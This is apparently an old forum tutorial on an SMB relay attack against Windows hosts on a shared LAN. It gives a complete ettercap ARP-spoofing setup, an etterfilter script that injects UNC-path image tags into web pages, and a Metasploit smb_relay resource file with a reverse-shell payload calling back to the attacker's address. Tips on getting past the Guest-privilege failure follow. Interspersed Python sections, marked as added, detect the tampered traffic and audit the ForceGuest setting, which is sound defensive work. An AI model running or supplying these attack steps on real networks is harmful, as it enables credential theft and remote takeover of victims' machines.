update 7:27 PM 2/4/2009: http://www.tarasco.org/security/smbrelay/index.html




videos:

# with ettercap
http://s5.video.blip.tv/170000300628...console219.flv

# Thursday, 20 September 2007 ( not with ettercap )
http://www.learnsecurityonline.com/v...ay-reverse.swf




4:42 PM 4/25/2008:
"" I tried it with "Use simple file sharing" (recommended) checked...and the exploit WOULD NOT WORK. ""

Sadly (sometimes!?!?) this is checked by default, so I will look into some other things...
You also want to check out the Fast-Track mass client-side attack, which has the GDI and QT exploits all in one, etc.! (This is part of fast-track.py; you must update it to current.)


Firefox by design will not load a 'local share'; this includes \\SMB\image.jpg shares.
(If anybody has a non-JavaScript workaround please let me know. Flash also has the same security, or just gets passed to Firefox and then borks.)

It may be possible to use this trick: 301-redirect the user to a local\share
http://forums.remote-exploit.org/showthread.php?p=94904



What you need:
* ettercap
* Metasploit Framework 3 (msf framework3)
* the victim must have admin privs with a non-blank password and must load an HTTP or HTTPS web page
* only works as a MITM (same LAN, etc.)

** Based on HD Moore's Defcon presentation 'Tactical Exploitation', which used WPAD: http://video.google.co.uk/videoplay?...56903673801959

change the IP to your IP


smb.rc
Code:
use exploit/windows/smb/smb_relay
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.1.90
set LPORT 21
exploit

smb.filter
Code:
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("</body>", "<img src=\"\\\\192.168.1.90\\image.jpg\"> </body>");
   replace("</Body>", "<img src=\"\\\\192.168.1.90\\image.jpg\"> </body>");
   msg("Filter Ran.\n");
}
# etterfilter compiles smb.filter into smb.ef for use with ettercap

etterfilter smb.filter -o smb.ef
# run ettercap against the target LAN
ettercap -T -q -F smb.ef -M ARP // // -P autoadd

# start up msfconsole with the RC script
/pentest/exploits/framework3/msfconsole -r smb.rc


What happens?

ettercap rewrites the page so the IMG points at \\yourip, so the victim tries to fetch the image from your SMB relay server.
The relay answers "no, access denied"; the victim then says "OK, let me try my login", which Windows sends by default.
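The filter above leaves two traces in the traffic it tampers with: a client request whose Accept-Encoding header name has been swapped for a same-length string while its value still lists encodings, and a server response carrying an &lt;img&gt; whose src is a UNC path. The Python below is an added detection example, not code from the post or from the ettercap or Metasploit projects; the HTTP messages it inspects are constructed samples, and the 192.168.1.90 address is simply the one the post uses.

```python
import re
from typing import Dict, List, Tuple

# Encoding tokens that normally only appear in an Accept-Encoding header.
# If they show up under any other header name, the name was very likely
# rewritten in transit: the filter above swaps it for a same-length string
# so the server ignores it and sends the body uncompressed (and injectable).
ENCODING_TOKENS = {"gzip", "deflate", "compress", "br", "identity", "x-gzip"}

# An <img> whose src is a UNC path (\\host\share\file). A browser that
# follows it opens an SMB session to "host", which is the trigger for the
# relay described in the post.
UNC_IMG = re.compile(
    r'<img\b[^>]*\bsrc\s*=\s*["\']?\\\\([^\\"\'\s>]+)',
    re.IGNORECASE,
)


def parse_http_message(raw: str) -> Tuple[str, List[Tuple[str, str]], str]:
    """Split a raw HTTP request or response into (start line, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def find_mangled_accept_encoding(headers: List[Tuple[str, str]]) -> List[str]:
    """Return header names that carry encoding tokens under the wrong name."""
    hits = []
    for name, value in headers:
        tokens = {t.strip().split(";")[0].lower() for t in value.split(",")}
        if name.lower() != "accept-encoding" and tokens & ENCODING_TOKENS:
            hits.append(name)
    return hits


def find_unc_image_hosts(body: str) -> List[str]:
    """Return the hosts named by UNC <img src> references in an HTML body."""
    return [m.group(1) for m in UNC_IMG.finditer(body)]


def inspect(raw: str) -> Dict[str, List[str]]:
    """Inspect one HTTP message and return the indicators found (empty if clean)."""
    _, headers, body = parse_http_message(raw)
    findings: Dict[str, List[str]] = {}
    mangled = find_mangled_accept_encoding(headers)
    if mangled:
        findings["mangled_accept_encoding"] = mangled
    hosts = find_unc_image_hosts(body)
    if hosts:
        findings["unc_image_hosts"] = hosts
    return findings


# Constructed samples (not captured traffic) of what a proxy or IDS would see
# after the post's filter has run, plus untouched messages for comparison.
TAMPERED_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Accept-Rubbish!: gzip, deflate\r\n"
    "User-Agent: Mozilla/4.0\r\n"
    "\r\n"
)
TAMPERED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body><p>hello</p>"
    '<img src="\\\\192.168.1.90\\image.jpg"> </body></html>'
)
CLEAN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "\r\n"
)
CLEAN_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    '<html><body><img src="/logo.png"></body></html>'
)

if __name__ == "__main__":
    for label, msg in [("tampered request", TAMPERED_REQUEST),
                       ("tampered response", TAMPERED_RESPONSE),
                       ("clean request", CLEAN_REQUEST),
                       ("clean response", CLEAN_RESPONSE)]:
        print(label, "->", inspect(msg) or "clean")
```

The Accept-Encoding check is the more robust of the two signals: the injected tag can be varied freely, but a filter that strips compression has to do it on the request, and the orphaned "gzip, deflate" value survives whatever the header was renamed to. Hosts returned under unc_image_hosts are the addresses any SMB connection from the browsing client should be checked against.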


""Great job, but I got the well-known error message, which starts so:
"FAILED! The remote host has only provided us with Guest privileges...."""

Read the error that comes before that one; the Guest error just means the auth failed.




Quote Originally Posted by www
5. On a Windows XP Pro computer, make sure that remote logons are not being coerced to the GUEST account (aka "ForceGuest", which is enabled by default on computers that are not attached to a domain). To do this, open the Local Security Policy editor (e.g. by typing 'secpol.msc' into the Run box, without quotes). Expand the "Local Policies" node and select "Security Options". Now scroll down to the setting titled "Network access: Sharing and security model for local accounts". If this is set to "Guest only", change it to "Classic" and restart your computer.
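The "Guest privileges" error quoted above and the ForceGuest setting in this quote are the same thing seen from two sides: with the model at "Guest only", a relayed network logon lands as Guest, so the relay fails; with "Classic", it lands as the real account. To audit the setting across hosts without opening secpol.msc, the following added Python (not from the post or from www) interprets the registry value behind that policy. It assumes the documented mapping HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ForceGuest, 1 = "Guest only", 0 = "Classic", and it parses constructed reg query output rather than reading a live registry, so it runs anywhere.

```python
import re
from typing import Dict, Optional

# One data line of "reg query" output: value name, type, data.
# The key-path line has no REG_ type column, so it never matches.
REG_LINE = re.compile(r"^\s*(\S+)\s+(REG_\w+)\s+(\S.*)$")


def parse_reg_query(text: str) -> Dict[str, str]:
    """Map value names (lower-cased) to their data from reg query output."""
    values: Dict[str, str] = {}
    for line in text.splitlines():
        m = REG_LINE.match(line)
        if m:
            name, _type, data = m.groups()
            values[name.lower()] = data.strip()
    return values


def sharing_model(text: str) -> Dict[str, Optional[object]]:
    """Interpret Lsa\\ForceGuest as the policy
    "Network access: Sharing and security model for local accounts".

    Assumed mapping (documented for XP): 1 = Guest only, 0 = Classic.
    A missing value is reported as unknown rather than guessed, because the
    effective default differs between workgroup and domain-joined machines.
    """
    values = parse_reg_query(text)
    raw = values.get("forceguest")
    if raw is None:
        return {"forceguest": None, "model": "unknown",
                "remote_logons_coerced_to_guest": None}
    force_guest = int(raw, 16) if raw.lower().startswith("0x") else int(raw)
    coerced = force_guest == 1
    return {
        "forceguest": force_guest,
        "model": "Guest only" if coerced else "Classic",
        # True means a relayed logon becomes Guest (the error quoted in the post);
        # False means it authenticates as the user whose session was relayed.
        "remote_logons_coerced_to_guest": coerced,
    }


# Constructed samples of "reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa"
# output; the second value name is a real Lsa value included only as noise.
WORKGROUP_XP = (
    "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\r\n"
    "    forceguest    REG_DWORD    0x1\r\n"
    "    lmcompatibilitylevel    REG_DWORD    0x2\r\n"
)
CLASSIC_XP = (
    "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\r\n"
    "    forceguest    REG_DWORD    0x0\r\n"
)
NO_VALUE = (
    "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\r\n"
    "    lmcompatibilitylevel    REG_DWORD    0x2\r\n"
)

if __name__ == "__main__":
    for label, dump in [("workgroup default", WORKGROUP_XP),
                        ("switched to Classic", CLASSIC_XP),
                        ("value absent", NO_VALUE)]:
        print(label, "->", sharing_model(dump))
```

A host reporting "Classic" is the one the prerequisites list at the top of the post describes: combined with a local admin that has a non-blank password, a relayed logon carries real privileges, so those hosts are where the setting deserves attention.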